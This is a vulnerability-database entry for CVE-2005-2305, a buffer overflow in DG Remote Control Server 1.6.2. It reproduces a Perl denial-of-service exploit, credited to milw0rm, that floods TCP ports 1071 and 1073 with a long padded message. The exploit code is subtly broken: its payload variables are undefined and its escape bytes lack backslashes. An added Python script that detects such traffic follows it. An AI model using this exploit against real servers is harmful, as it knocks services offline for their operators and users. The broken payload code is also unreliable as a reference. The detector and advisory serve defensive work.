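DG Remote Control Server Denial-of-Service Vulnerability
Vulnerability ID | 1108936 | Vulnerability type | Buffer overflow |
Published | 2005-07-15 | Updated | 2005-10-20 |
CVE ID | CVE-2005-2305 |
CNNVD-ID | CNNVD-200507-229 |
Platform | Windows | CVSS score | 7.5 |
|Vulnerability source
|Vulnerability details
DG Remote Control Server is remote-control server software. DG Remote Control Server 1.6.2 contains a denial-of-service vulnerability. A remote attacker can cause a denial of service (crash or CPU consumption), and possibly execute arbitrary code, by sending a long message to TCP port 1071 or 1073. The cause of the vulnerability may be a buffer overflow.
|Exploit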
#!/usr/local/bin/perl
#
# Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#
$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n";
print " Remote Control Server DOS Exploit\n";
print "------------------------------------\n\n";
print "Usage: $0 [remote IP]\n";
print "Exam: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071";
print "\n";
print "[+] Connect to $remote..\n";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
print "[+] Connected\n";
print "[+] Build server sploit..\n";
sleep(3);
print "[+] Attacking server..\n";
sleep(2);
$msg = "reboot" . $sploit . "x90" x (3096 - length($sploit)) . "xe8xf1xc5x05" . "|LOGOFF|";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONE\n";
print "[+] Server D0s'ed\n";
sleep(1);
close(SOCK);
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073";
print "[+] Connect to Client server..\n";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";
print "[+] Connected\n";
print "[+] Build client Spl0it..\n";
sleep(3);
print "[+] Attacking client..\n";
sleep(2);
print $dos;
send(SOCK1, $dos, 0) or die "Cannot send query: $!";
print "DONE\n";
print "[+] Client D0s'ed\n";
sleep(1);
close(SOCK1);
exit;
# milw0rm.com [2005-07-15]
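A defender-side check for the long-message condition described in the vulnerability details, as an added example that is not part of the original advisory or the exploit author's code: it flags oversized or heavily padded messages sent to TCP 1071/1073. The `Segment` record format and the `MAX_MSG_LEN` and `MIN_PAD_RUN` thresholds are assumptions, since the advisory does not state the size of the affected buffer.

```python
from dataclasses import dataclass

DG_PORTS = {1071, 1073}   # ports named in the advisory
MAX_MSG_LEN = 1024        # assumed threshold; the advisory gives no buffer size
MIN_PAD_RUN = 256         # assumed: a repeated-byte run this long counts as padding


@dataclass
class Segment:
    """One reassembled client-to-server message (hypothetical record format)."""
    src: str
    dst_port: int
    payload: bytes


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect(seg: Segment) -> list:
    """Return the reasons a segment matches the long-message condition."""
    if seg.dst_port not in DG_PORTS:
        return []
    reasons = []
    if len(seg.payload) > MAX_MSG_LEN:
        reasons.append(f"oversized message ({len(seg.payload)} bytes)")
    if longest_run(seg.payload) >= MIN_PAD_RUN:
        reasons.append("long repeated-byte padding run")
    return reasons


# Constructed sample traffic, not captured from a real host.
SAMPLES = [
    Segment("10.0.0.5", 1071, b"reboot|LOGOFF|"),
    Segment("10.0.0.9", 1071, b"reboot" + b"A" * 3000 + b"|LOGOFF|"),
    Segment("10.0.0.9", 1073, bytes(range(256)) * 8),
    Segment("10.0.0.7", 8080, b"B" * 5000),
]

if __name__ == "__main__":
    for s in SAMPLES:
        for reason in inspect(s):
            print(f"ALERT {s.src} -> tcp/{s.dst_port}: {reason}")
```

Tune both thresholds against normal traffic for the deployment before alerting on them.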
|References
Source: BID
Name: 14263
Link: http://www.securityfocus.com/bid/14263
Source: MISC
Link: http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=72
Source: SECUNIA
Name: 16070
Link: http://secunia.com/advisories/16070